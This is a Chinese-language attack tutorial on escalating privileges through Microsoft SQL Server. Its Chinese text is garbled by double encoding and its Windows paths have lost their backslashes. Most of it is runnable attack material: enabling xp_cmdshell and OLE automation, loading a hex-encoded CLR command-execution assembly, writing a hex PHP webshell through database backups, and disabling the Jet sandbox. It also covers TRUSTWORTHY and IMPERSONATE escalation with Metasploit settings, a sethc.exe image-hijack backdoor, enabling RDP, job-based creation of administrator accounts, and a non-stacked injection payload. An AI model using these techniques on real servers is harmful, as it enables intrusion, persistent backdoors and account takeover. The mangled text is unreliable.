判斷當(dāng)前用戶權(quán)限
sa權(quán)限:數(shù)據(jù)庫操作,文件管理,命令執(zhí)行,注冊表讀取等system。SQLServer數(shù)據(jù)庫的最高權(quán)限
db權(quán)限:文件管理,數(shù)據(jù)庫操作等權(quán)限 users-administrators
public權(quán)限:數(shù)據(jù)庫操作 guest-users
判斷是否是SA權(quán)限
select is_srvrolemember('sysadmin')
判斷是否是db_owner權(quán)限
select is_member('db_owner')
判斷是否是public權(quán)限
select is_srvrolemember('public')
使用xp_cmdshell執(zhí)行系統(tǒng)命令(sa權(quán)限)
xp_cmdshell默認(rèn)在mssql2000中是開啟的,在mssql2005之后默認(rèn)禁止,但未刪除
判斷xp_cmdshell狀態(tài)
我們可以在master.dbo.sysobjects中查看xp_cmdshell狀態(tài)
只用判斷存在,利用count(*)即可。
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
xtype為對象類型,xtype='x'這里表示xp_cmdshell的對象類型為擴(kuò)展存儲過程。
存在即返回1 ? ?
啟用xp_cmdshell
如果xp_cmdshell權(quán)限沒開啟的話,我們可以利用EXEC啟用xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
也可以用如下語句:
execute('sp_configure "show advanced options",1') *#**將該選項(xiàng)的值設(shè)置為**1* execute('reconfigure') *#**保存設(shè)置* execute('sp_configure "xp_cmdshell", 1') *#**將**xp_cmdshell**的值設(shè)置為**1* execute('reconfigure') *#**保存設(shè)置
恢復(fù)被刪除的xp_cmdshell
若xp_cmdshell被刪除,可以上傳xplog70.dll進(jìn)行恢復(fù)刪除的xp_cmdshell
Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\xplog70.dll'
利用xp_cmdshell執(zhí)行命令
通過xp_cmdshell執(zhí)行系統(tǒng)命令指令如下: (master.. 可以不加)
exec master..xp_cmdshell 'whoami'
利用xp_cmdshell寫文件
先利用 dir 找到web服務(wù)根目錄
exec master..xp_cmdshell 'dir'
然后通過 echo 將一句話木馬寫入文件,即可連webshell
exec xp_cmdshell 'echo test>d:1.txt'
最后命令關(guān)閉xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;
使用sp_oacreate+sp_oamethod執(zhí)行系統(tǒng)命令(sa權(quán)限)
當(dāng) xp_cmdshell 被刪除可以使用這個(gè)來提權(quán)試試,恢復(fù) sp_oacreate
sp_oacreate 是一個(gè)非常危險(xiǎn)的存儲過程可以刪除、復(fù)制、移動文件。還能配合 sp_oamethod 來寫文件執(zhí)行 cmd。
使用sp_oacreate提權(quán)前提條件:
系統(tǒng)管理員使用sp_configure啟用sp_oacreate和sp_oamethod系統(tǒng)存儲過程對OLE自動化過程的訪問(OLE Automation Procedures)
在效果方面,sp_oacreate、sp_oamethod兩個(gè)過程和xp_cmdshell過程功能類似,因此可以替換使用!
利用條件:
1.已獲取到sqlserver sysadmin權(quán)限用戶的賬號與密碼且未降權(quán)(如2019版本sa用戶權(quán)限為mssqlserver,已降權(quán))
2.sqlserver允許遠(yuǎn)程連接
查看sp_oacreate狀態(tài)
select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE';
返回1表示存在sp_oacreate系統(tǒng)存儲過程
開啟存儲過程
先開啟存儲過程(語句中間沒有空格,以下語句是一起執(zhí)行):
exec sp_configure 'show advanced options', 1; RECONFIGURE; exec sp_configure 'Ole Automation Procedures',1; RECONFIGURE;
執(zhí)行命令
此時(shí)可以執(zhí)行系統(tǒng)命令了,但是使用 sp_oacreate 執(zhí)行系統(tǒng)命令不回顯:
wscript.shell 執(zhí)行命令 declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'whoami'
可以使用以下命令創(chuàng)建用戶hack:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystem32cmd.exe /c net user hack Password@ /add'
由于無回顯,我們可以將命令執(zhí)行的結(jié)果寫的文件中,再將文件中的內(nèi)容讀到表中,最后查詢表中的內(nèi)容
1、執(zhí)行以下命令
declare @shell INT;
exec sp_oacreate 'wscript.shell',@shell output;
exec sp_oamethod @shell,'run',null,' c:windowssystem32cmd.exe /c whoami > C: emp1.txt ','0','true';
執(zhí)行打開cmd.exe文件并執(zhí)行whoami并將結(jié)果寫入到c: emp1.txt中
2、 再將創(chuàng)建的文件1.txt寫入到readfile表中,查詢表中的內(nèi)容以驗(yàn)證上面命令是否執(zhí)行成功
Use model;
bulk insert readfile from 'C: emp1.txt'
WITH (
DATAFILETYPE = 'char',
KEEPNULLS
)
select * from readfile
使用CLR執(zhí)行系統(tǒng)命令(sa權(quán)限)
#啟用MSSQL CLR功能
exec sp_configure 'show advanced options', 1; RECONFIGURE; Exec sp_configure 'clr enabled', 1; RECONFIGURE;
#為了導(dǎo)入了不安全的程序集,我們還需要將數(shù)據(jù)庫標(biāo)記為安全。
ALTER DATABASE [master] SET TRUSTWORTHY ON;
#導(dǎo)入程序集,單獨(dú)執(zhí)行
CREATE ASSEMBLY [WarSQLKit] AUTHORIZATION [dbo] FROM 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c0103006643f55f0000000000000000e00022200b013000000e00000006000000000000022d0000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000b02c00004f00000000400000b803000000000000000000000000000000000000006000000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e74657874000000080d000000200000000e000000020000000000000000000000000000200000602e72737263000000b8030000004000000004000000100000000000000000000000000000400000402e72656c6f6300000c0000000060000000020000001400000000000000000000000000004000004200000000000000000000000000000000e42c00000000000048000000020005005c220000540a00000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000be280e00000a72010000706f0f00000a280e00000a7243000070725300007002281000000a28020000066f0f00000a2a1b300600a40100000100001173040000060a731100000a0b076f1200000a026f1300000a03281400000a2d0c076f1200000a036f1500000a076f1200000a176f1600000a076f1200000a176f1700000a076f1200000a166f1800000a076f1200000a176f1900000a076f1200000a176f1a00000a06731b00000a7d010000040706fe0605000006731c00000a6f1d00000a140c076f1e00000a26076f1f00000a076f2000000a6f2100000a0c076f2200000ade390d280e00000a1b8d160000012516725d000070a2251702a2251803a225197291000070a2251a096f2300000aa2282400000a6f0f00000ade00076f2500000a2d1a280e00000a067b010000046f2600000a6f0f00000a3895000000731b00000a130408281400000a2d091104086f2700000a26067b010000046f2800000a2c20110472970000706f2700000a261104067b010000046f2600000a6f2700000a26280e00000a1c8d16000001251602a2251703a2251872af000070a22519076f2500000a13051205282900000aa2251a7291000070a2251b1104252d0426142b056f2600000aa2282400000a6f0f00000a067b010000046f2600000a2a011000000000870021a80039100000011e02282a00000a2a4e027b01000004046f2b00000a6f2700000a262a42534a4201000100000000000c00000076322e302e35303732370000000005006c00000038030000237e0000a4030000a804000023537472696e6773000000004c080000e80000002355530034090000100000002347554944000000440900001001000023426c6f620000000000000002000001571502000902000000fa013300160000010000001c000000030000000100000005000000050000002b0000000d000000010000000100000003000000010000000000b1020100000000000600ed01ae0306005a02ae03060038019b030f00ce03000006004c01cd020600d001cd020600b101cd0206004102cd0206000d02cd0206002602cd0206007901cd0206009401cd0206003004c6020a0063014e030e0009049b030600df02c602060020036e0406001d01ae030e00ee039b030a007a044e030a0015014e0306008e02c6020e00f7029b030e00c4009b030e0035039b0306000803360006001503360006002700c602000000002d00000000000100010001001000dd030000350001000100030110000100000035000100040006006404740050200000000096005e007800010080200000000096008b001a00020040220000000086189503060004004022000000008618950306000400482200000000830016007d000400000001007d0000000100e400000002001f04000001002e03000002000404090095030100110095030600190095030a00290095031000310095031000390095031000410095031000490095031000510095031000590095031000610095031000710095030600910095030600a1000c011500a90096001000b10029041a007900950306007900e9022d00b900d7001000b10098043200b90011041000b90085043700b900b4003c00b90078023700b9007b033700b90049043700890095030600c90095034200790066004800790043044e007900ed000600790069035200d900810057007900370406008100a8005700b10029045b0079009b00610069008c025700890001016500890095026100e1008c02570069009503060099004c005700200063000b012e000b0084002e0013008d002e001b00ac002e002300b5002e002b00cb002e003300cb002e003b00cb002e004300d1002e004b00e1002e005300cb002e005b00fe0063006b000b012000048000000100000000000000000000000000a00200000200000000000000000000006b005500000000000200000000000000000000006b004000000000000200000000000000000000006b00c60200000000030002000000003c3e635f5f446973706c6179436c617373315f30003c52756e436f6d6d616e643e625f5f3000496e743332003c4d6f64756c653e0053797374656d2e494f0053797374656d2e44617461006765745f44617461006d73636f726c696200436d6445786563006164645f4f757470757444617461526563656976656400636d640052656164546f456e640052756e436f6d6d616e640053656e64006765745f45786974436f6465006765745f4d657373616765007365745f57696e646f775374796c650050726f6365737357696e646f775374796c65007365745f46696c654e616d650066696c656e616d6500426567696e4f7574707574526561644c696e6500417070656e644c696e65006765745f506970650053716c5069706500436f6d70696c657247656e6572617465644174747269627574650044656275676761626c6541747472696275746500417373656d626c795469746c654174747269627574650053716c50726f63656475726541747472696275746500417373656d626c7954726164656d61726b41747472696275746500417373656d626c7946696c6556657273696f6e41747472696275746500417373656d626c79436f6e66696775726174696f6e41747472696275746500417373656d626c794465736372697074696f6e41747472696275746500436f6d70696c6174696f6e52656c61786174696f6e7341747472696275746500417373656d626c7950726f6475637441747472696275746500417373656d626c79436f7079726967687441747472696275746500417373656d626c79436f6d70616e794174747269627574650052756e74696d65436f6d7061746962696c697479417474726962757465007365745f5573655368656c6c4578656375746500546f537472696e67006765745f4c656e6774680057617253514c4b69744d696e696d616c0057617253514c4b69744d696e696d616c2e646c6c0053797374656d0053797374656d2e5265666c656374696f6e00457863657074696f6e006765745f5374617274496e666f0050726f636573735374617274496e666f0053747265616d526561646572005465787452656164657200537472696e674275696c6465720073656e646572004461746152656365697665644576656e7448616e646c6572004d6963726f736f66742e53716c5365727665722e536572766572006765745f5374616e646172644572726f72007365745f52656469726563745374616e646172644572726f72002e63746f720053797374656d2e446961676e6f73746963730053797374656d2e52756e74696d652e436f6d70696c6572536572766963657300446562756767696e674d6f6465730053746f72656450726f63656475726573004461746152656365697665644576656e744172677300617267730050726f63657373007365745f417267756d656e747300617267756d656e747300436f6e636174004f626a6563740057616974466f7245786974005374617274007365745f52656469726563745374616e646172644f7574707574007374644f75747075740053797374656d2e546578740053716c436f6e74657874007365745f4372656174654e6f57696e646f770049734e756c6c4f72456d707479000000004143006f006d006d0061006e0064002000690073002000720075006e006e0069006e0067002c00200070006c006500610073006500200077006100690074002e00000f63006d0064002e00650078006500000920002f006300200000334f00530020006500720072006f00720020007700680069006c006500200065007800650063007500740069006e006700200000053a002000001753007400640020006f00750074007000750074003a0000372000660069006e00690073006800650064002000770069007400680020006500780069007400200063006f006400650020003d0020000000c1b0e79eb8eb6348be1e0c1d83c2d05800042001010803200001052001011111042001010e04000012550500020e0e0e0c0706120c123d0e1241124508042000125d040001020e0420010102052001011161052002011c180520010112650320000204200012690320000e0500010e1d0e0320000805200112450e08b77a5c561934e08903061245040001010e062002011c124d0801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f7773010801000200000000001501001057617253514c4b69744d696e696d616c00000501000000000f01000a457975702043454c494b00001c010017687474703a2f2f6579757063656c696b2e636f6d2e747200000c010007312e302e302e3000000401000000d82c00000000000000000000f22c0000002000000000000000000000000000000000000000000000e42c0000000000000000000000005f436f72446c6c4d61696e006d73636f7265652e646c6c0000000000ff25002000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000005c03000000000000000000005c0334000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000001000000000000000100000000003f000000000000000400000002000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e00000000000000b004bc020000010053007400720069006e006700460069006c00650049006e0066006f0000009802000001003000300030003000300034006200300000001a000100010043006f006d006d0065006e007400730000000000000022000100010043006f006d00700061006e0079004e0061006d00650000000000000000004a0011000100460069006c0065004400650073006300720069007000740069006f006e0000000000570061007200530051004c004b00690074004d0069006e0069006d0061006c0000000000300008000100460069006c006500560065007200730069006f006e000000000031002e0030002e0030002e00300000004a001500010049006e007400650072006e0061006c004e0061006d0065000000570061007200530051004c004b00690074004d0069006e0069006d0061006c002e0064006c006c00000000005400180001004c006500670061006c0043006f007000790072006900670068007400000068007400740070003a002f002f006500790075007000630065006c0069006b002e0063006f006d002e007400720000002a00010001004c006500670061006c00540072006100640065006d00610072006b00730000000000000000005200150001004f0072006900670069006e0061006c00460069006c0065006e0061006d0065000000570061007200530051004c004b00690074004d0069006e0069006d0061006c002e0064006c006c000000000036000b000100500072006f0064007500630074004e0061006d0065000000000045007900750070002000430045004c0049004b0000000000340008000100500072006f006400750063007400560065007200730069006f006e00000031002e0030002e0030002e003000000038000800010041007300730065006d0062006c0079002000560065007200730069006f006e00000031002e0030002e0030002e003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000c000000043d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 WITH PERMISSION_SET = UNSAFE;
#創(chuàng)建存儲過程,單獨(dú)執(zhí)行
CREATE PROCEDURE sp_cmdExec @Command [nvarchar](4000) WITH EXECUTE AS CALLER AS EXTERNAL NAME WarSQLKit.StoredProcedures.CmdExec;
#執(zhí)行命令
EXEC sp_cmdExec 'whoami';
#刪除該程序集
DROP PROCEDURE sp_cmdExec;DROP ASSEMBLY [WarSQLKit];
通過備份上傳木馬getshell(dbo權(quán)限)
備份拿 shell 也就涉及到了權(quán)限的問題,SA 權(quán)限不用說,沒有降權(quán)的話基本能做任何事情了,它數(shù)據(jù)庫權(quán)限是 db_owner,當(dāng)然其他用戶如果也擁有 db_owner 基本也可以通過備份拿下 shell,但是在設(shè)置目錄權(quán)限后就不行了。
路徑的尋找
需要路徑的我們一般有幾個(gè)思路:
報(bào)錯(cuò)尋找
字典
旁站信息收集
調(diào)用儲存過程來搜索
讀配置文件
這里我們著重討論一下儲存過程也就是這些函數(shù)來找我們的網(wǎng)站根目錄。一般我們可以用 xp_cmdshell、xp_dirtree、xp_dirtree、xp_subdirs
execute master..xp_dirtree 'c:' //列出所有 c: 文件和目錄,子目錄 execute master..xp_dirtree 'c:',1 //只列 c: 文件夾 execute master..xp_dirtree 'c:',1,1 //列 c: 文件夾加文件
通過執(zhí)行 xp_dirtree 返回我們傳入的參數(shù),如果沒有回顯的話,可以這樣創(chuàng)建一個(gè)臨時(shí)的表插入
id=1;CREATE TABLE tmp (dir varchar(8000),num int,num1 int); id=1;insert into tmp(dir,num,num1) execute master..xp_dirtree 'c:',1,1
xp_cmdshell 尋找路徑:
這個(gè) xp_cmdshell 找起來更加方便我們調(diào)用cmd的命令去搜索,比如我的web目錄有個(gè)1.aspx
C:UsersGee>for /r c: %i in (1*.aspx) do @echo %i c:www1.aspx
所以只需要建立一個(gè)表,存在一個(gè) char 字段就可以了。
id=1;CREATE TABLE cmdtmp (dir varchar(8000)); id=1;insert into cmdtmp(dir) exec master..xp_cmdshell 'for /r c: %i in (1*.aspx) do @echo %i'
LOG備份Getshell
備份文件小,不容易出現(xiàn)臟數(shù)據(jù),推薦使用
無論是LOG備份還是差異備份,都是利用備份的過程中寫入一句話木馬
SQLServer常見的備份策略:
每周一次完整備份
每天一次差異備份
每小時(shí)一次事務(wù)日志備份
利用前提:
目標(biāo)機(jī)器存在數(shù)據(jù)庫備份文件 ,也就是如下,我們利用test數(shù)據(jù)庫的話,則需要該test數(shù)據(jù)庫存在數(shù)據(jù)庫備份文件
知道網(wǎng)站的絕對路徑
該注入支持堆疊注入
alter database 數(shù)據(jù)庫名 set RECOVERY FULL; #修改數(shù)據(jù)庫恢復(fù)模式為 完整模式 create table cmd (a image); #創(chuàng)建一張表cmd,只有一個(gè)列 a,類型為image backup log 數(shù)據(jù)庫名 to disk= 'C:phpstudyWWW1.php' with init; #備份表到指定路徑 insert into cmd (a) values(0x3c3f70687020406576616c28245f504f53545b785d293b3f3e); #插入一句話到cmd表里 backup log 數(shù)據(jù)庫名 to disk='C:phpstudyWWW2.php'; #把操作日志備份到指定文件 drop table cmd; #刪除cmd表
第四行的 0x3c3f70687020406576616c28245f504f53545b785d293b3f3e 是一句話木馬 的16進(jìn)制表示
會在目標(biāo)網(wǎng)站根目錄下生成1.php和2.php文件,其中1.php 保存數(shù)據(jù)庫,2.php就是我們需要連接的木馬文件。
用菜刀連接即可
差異備份Getshell
注:差異備份有概率會把網(wǎng)站搞崩,所以不建議使用差異備份
利用前提:
知道網(wǎng)站的絕對路徑 C:phpstudyWWW
該注入支持堆疊注入
注:以下語句一條一條執(zhí)行
create table [dbo].[test] ([cmd] [image]) declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x786965 backup log @a to disk = @s with init,no_truncate insert into [test](cmd) values(0x3c3f70687020406576616c28245f504f53545b785d293b3f3e) declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x43003A005C00700068007000730074007500640079005C005700570057005C007300680065006C006C002E00700068007000 backup log @a to disk=@s with init,no_truncate Drop table [test]
這里第二行的 0x786965,是字符 xie 的16進(jìn)制表示,這里隨便填都可以
第三行的 0x3c3f70687020406576616c28245f504f53545b785d293b3f3e 是一句話木馬 的16進(jìn)制表示
第四行的0x43003A005C00700068007000730074007500640079005C005700570057005C007300680065006C006C002E00700068007000是 C:phpstudyWWWshell.php 的16進(jìn)制表示
然后會在目標(biāo)網(wǎng)站根目錄下生成shell.php木馬文件
沙盒提權(quán)
沙盒模式是一種安全功能,用于限制數(shù)據(jù)庫只對控件和字段屬性中的安全且不含惡意代碼的表達(dá)式求值。如果表達(dá)式不使用可能以某種方式損壞數(shù)據(jù)的函數(shù)或?qū)傩裕ㄈ鏚ill 和 Shell 之類的函數(shù)),則可認(rèn)為它是安全的。當(dāng)數(shù)據(jù)庫以沙盒模式運(yùn)行時(shí),調(diào)用這些函數(shù)的表達(dá)式將會產(chǎn)生錯(cuò)誤消息。
沙盒提權(quán)的原理就是jet.oledb(修改注冊表)執(zhí)行系統(tǒng)命令。數(shù)據(jù)庫通過查詢方式調(diào)用mdb文件,執(zhí)行參數(shù),繞過系統(tǒng)本身自己的執(zhí)行命令,實(shí)現(xiàn)mdb文件執(zhí)行命令。
利用前提:
1.需要Microsoft.Jet.OLEDB.4.0一般在32位系統(tǒng)才可以,64位機(jī)需要12.0,較復(fù)雜
2.dnary.mdb和ias.mdb兩個(gè)文件 在win2003上默認(rèn)存在,也可自行準(zhǔn)備
xp_regwrite 可用、關(guān)閉沙盒模式
復(fù)現(xiàn)環(huán)境
SQL Server2008 (Win2003-x32) IP: 192.168.112.173
1)測試 jet.oledb 能否使用
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:windowssystem32iasias.mdb','select shell("cmd.exe /c whoami")')
在SQL2005默認(rèn)是禁用Ad Hoc Distributed,執(zhí)行命令時(shí),會提示錯(cuò)誤。需要開啟
2)開啟Ad Hoc Distributed Queries組件
exec sp_configure 'show advanced options',1 ; reconfigure ; exec sp_configure 'Ad Hoc Distributed Queries',1 ; reconfigure;
類似的,關(guān)閉組件命令
exec sp_configure 'show advanced options',1 ; reconfigure ; exec sp_configure 'Ad Hoc Distributed Queries',0 ; reconfigure;
3)關(guān)閉沙盒模式
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',0; 沙盒模式`SandBoxMode`參數(shù)含義(默認(rèn)是2) 0:在任何所有者中禁止啟用安全模式 1:為僅在允許范圍內(nèi) 2:必須在access模式下 3:完全開啟
查看命令:
exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines', 'SandBoxMode'
關(guān)閉命令:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',2
4)執(zhí)行命令
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:windowssystem32iasias.mdb','select shell("cmd.exe /c whoami >c:\sqltest.txt ")');
在win2003的c盤上看到已經(jīng)創(chuàng)建了該文件,命令執(zhí)行成功
同樣,可以創(chuàng)建用戶
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:windowssystem32iasias.mdb','select shell("net user testq QWEasd123 /add")'); Select * From OpenRowSet('microsoft.jet.oledb.4.0',';Database=c:windowssystem32iasias.mdb','select shell("net localgroup administrators testq /add")'); Select * From OpenRowSet('microsoft.jet.oledb.4.0',';Database=c:windowssystem32iasias.mdb','select shell("net user testq")');
可信數(shù)據(jù)庫(DBO用戶提權(quán)到DBA)
1 預(yù)設(shè)存在漏洞的配置
打開SQL Server Management Studio,登錄sa用戶 。
點(diǎn)擊“新建查詢”,創(chuàng)建數(shù)據(jù)庫名為“TestDb”。
CREATE DATABASE TestDb;
新建測試用戶TestUser。
CREATE LOGIN TestUser WITH PASSWORD = 'Passw0rd';
使用如下的TSQL語句,數(shù)據(jù)庫TestDb的db_owner權(quán)限賦予給用戶TestUser。
USE TestDb ALTER LOGIN [TestUser] with default_database = [TestDb]; CREATE USER [TestUser] FROM LOGIN [TestUser]; EXEC sp_addrolemember [db_owner], [TestUser];
設(shè)置TestDb數(shù)據(jù)庫為可信,這個(gè)是漏洞存在的關(guān)鍵。
ALTER DATABASE TestDb SET TRUSTWORTHY ON
下面的查詢語句會返回SQL Server實(shí)例中所有的數(shù)據(jù)庫中,可信數(shù)據(jù)庫的標(biāo)記情況,is_trustworthy_on開關(guān)為1即可信??梢钥吹絋estDb已設(shè)置為可信數(shù)據(jù)庫。
SELECT a.name,b.is_trustworthy_on FROM master..sysdatabases as a INNER JOIN sys.databases as b ON a.name=b.name;
2漏洞利用過程
使用TestUser用戶登錄數(shù)據(jù)庫。
嘗試開啟xp_cmdshell,可以看到權(quán)限不夠。
EXEC sp_configure 'show advanced options','1' --確保show advances options 的值為1 RECONFIGURE GO EXEC sp_configure 'xp_cmdshell',1 --開啟xp_cmdshell RECONFIGURE GO
查詢是否sysadmin角色權(quán)限,顯示0,還不是sysadmin權(quán)限。
SELECT is_srvrolemember('sysadmin')
創(chuàng)建存儲過程sp_elevate_me。
USE TestDb GO CREATE PROCEDURE sp_elevate_me WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember 'TestUser','sysadmin' GO
接下來,執(zhí)行上述sp_elevate_me存儲過程,給TestUser用戶添加sysadmin角色。
USE TestDb EXEC sp_elevate_me
再次嘗試開啟xp_cmdshell,并且執(zhí)行whoami??吹铰┒蠢贸晒α?。
3 msf自動化提權(quán)
msf已經(jīng)內(nèi)置了攻擊模塊
auxiliary/admin/mssql/mssql_escalate_dbowner,直接調(diào)用即可。如果是從sql注入點(diǎn)提權(quán),就使用模塊
mssql_escalate_dbowner_sqli。
我的攻擊參數(shù)配置如下:
use auxiliary/admin/mssql/mssql_escalate_dbowner SET RHOSTS 192.168.234.130 SET USERNAME TestUser SET PASSWORD Passw0rd run
用戶模擬(DBO用戶提權(quán)到DBA)
1預(yù)設(shè)存在漏洞的配置
使用sa帳戶登錄SQL Server,創(chuàng)建4個(gè)新用戶。
CREATE LOGIN MyUser1 WITH PASSWORD = 'MyPassword!'; CREATE LOGIN MyUser2 WITH PASSWORD = 'MyPassword!'; CREATE LOGIN MyUser3 WITH PASSWORD = 'MyPassword!'; CREATE LOGIN MyUser4 WITH PASSWORD = 'MyPassword!';
賦予用戶MyUser1權(quán)限模擬 MyUser2, MyUser3,及sa,這個(gè)是漏洞存在的關(guān)鍵。在實(shí)戰(zhàn)中,未必能遇到模擬sa用戶特權(quán)的情況,但如果開發(fā)人員模擬了MyUser2或者M(jìn)yUser3,就能從MyUser1訪問其它數(shù)據(jù)庫資源。
USE master; GRANT IMPERSONATE ON LOGIN::sa to [MyUser1]; GRANT IMPERSONATE ON LOGIN::MyUser2 to [MyUser1]; GRANT IMPERSONATE ON LOGIN::MyUser3 to [MyUser1]; GO
2漏洞利用過程
切換MyUser1用戶登錄數(shù)據(jù)庫。
執(zhí)行如下SQL語句,可以快速找到允許被模擬的用戶列表。
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
執(zhí)行下面語言,在執(zhí)行了EXECUTE AS LOGIN語句后,成功模擬sa用戶特權(quán)。
SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin') EXECUTE AS LOGIN = 'sa' SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin')
3 msf自動化提權(quán)
同樣的,這個(gè)漏洞也有對應(yīng)的msf攻擊模塊。如果是從sql注入點(diǎn)提權(quán),就選擇mssql_escalate_execute_as_sqli。
我的攻擊參數(shù)配置如下:
use auxiliary/admin/mssql/mssql_escalate_execute_as set RHOSTS 192.168.234.130 set USERNAME MyUser1 set PASSWORD MyPassword! run
映像劫持提權(quán)
2008以上,05未測試
通過使用xp_regwrite存儲過程對注冊表進(jìn)行修改,替換成任意值,造成鏡像劫持。
前提條件:
1.未禁止注冊表編輯(即寫入功能)
2.xp_regwrite啟用
復(fù)現(xiàn)
1)查看xp_regwrite是否啟用
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_regwrite'
2)xp_regwrite開啟與關(guān)閉
EXEC sp_configure 'show advanced options', 1 RECONFIGURE EXEC sp_configure 'xp_regwrite',1 RECONFIGURE
3)利用regwrite函數(shù)修改組注冊表進(jìn)行劫持
EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE',@key='SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.EXE',@value_name='Debugger',@type='REG_SZ',@value='c:windowssystem32cmd.exe'
4)查看是否修改成功文件
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe','Debugger'
顯示已修改為cmd.exe
在目標(biāo)主機(jī)上查看,結(jié)果一致
5)驗(yàn)證是否成功
連按5次粘滯鍵,彈出cmd框
拓展
上面對只是對粘滯鍵進(jìn)行修改,類似的,可以在注冊表中進(jìn)行其他操作
刪除指定注冊表鍵值對
刪除粘滯鍵的鍵值
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe'
到目標(biāo)主機(jī)上查看,發(fā)現(xiàn)sethc.exe在注冊表中的值已刪除
開啟3389端口
這里的xp_regwrite為向注冊表中寫數(shù)據(jù)
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminal Server','fDenyTSConnections','REG_DWORD',0; exec master..xp_cmdshell "REG ADD 'HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server' /v fDenyTSConnections /t REG_DWORD /d 0"
在注冊表中也可以看到3389端口被打開
JOB提權(quán)
原理是創(chuàng)建一個(gè)任務(wù)X,并執(zhí)行命令,對于命令執(zhí)行后的結(jié)果將返回給文檔job.txt
詳細(xì)過程
1、 啟動sqlagent服務(wù)
exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'
2、 創(chuàng)建任務(wù)X,X為任務(wù)名稱并執(zhí)行命令,命令執(zhí)行后的結(jié)果將返回給文檔job.txt
use msdb exec sp_delete_job null,'x' exec sp_add_job 'x' exec sp_add_jobstep null,'x',null,'1','cmdexec','cmd /c "net user hack1 hack1 /add &net localgroup administrators hack1 /add>c:/job.txt"' exec sp_add_jobserver null,'x',@@servername exec sp_start_job 'x';
3、再查看用戶發(fā)現(xiàn)hack1用戶存在且已經(jīng)在管理員組里面
無法堆疊的情況下執(zhí)行系統(tǒng)命令
https://blog.51cto.com/u_15127627/4024124
那么 exec 真的需要多句才能執(zhí)行嗎?,來直接看 payload 吧
if 語句的表達(dá)式如下,也就是說,我們是可以借助 if 來執(zhí)行 sql_statement,那么只要你能在你的注入點(diǎn)構(gòu)造一個(gè) if 出來,不需要環(huán)境支持堆疊也可以達(dá)到堆疊的效果。
IF Boolean_expression { sql_statement | statement_block } [ ELSE { sql_statement | statement_block } ]
完整的 payload
select 1 where 1=1 if 1=1 execute('exec sp_configure ''show advanced options'', 1;reconfigure;exec sp_configure ''xp_cmdshell'', 1;reconfigure;exec xp_cmdshell ''whoami''');
審核編輯:劉清
-
SQL數(shù)據(jù)庫
+關(guān)注
關(guān)注
0文章
